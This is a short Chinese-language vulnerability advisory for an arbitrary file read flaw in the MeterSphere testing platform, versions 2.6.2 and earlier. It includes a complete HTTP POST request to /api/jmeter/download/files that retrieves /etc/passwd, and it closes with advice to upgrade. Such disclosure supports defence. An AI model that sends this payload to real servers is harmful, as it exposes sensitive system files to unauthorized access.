漏洞说明
MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。
Metersphere file 接口存在任意文件读取漏洞,攻击者通过接口可以获取敏感文件压缩包
影响版本
- Metersphere <=2.6.2
漏洞复现
payload:
POST /api/jmeter/download/files HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 73
{"reportId": "pass", "bodyFiles": [{"id": "aaa", "name": "/etc/passwd"}]}
1682652014391.jpg
修复建议
1、升级到最新安全版本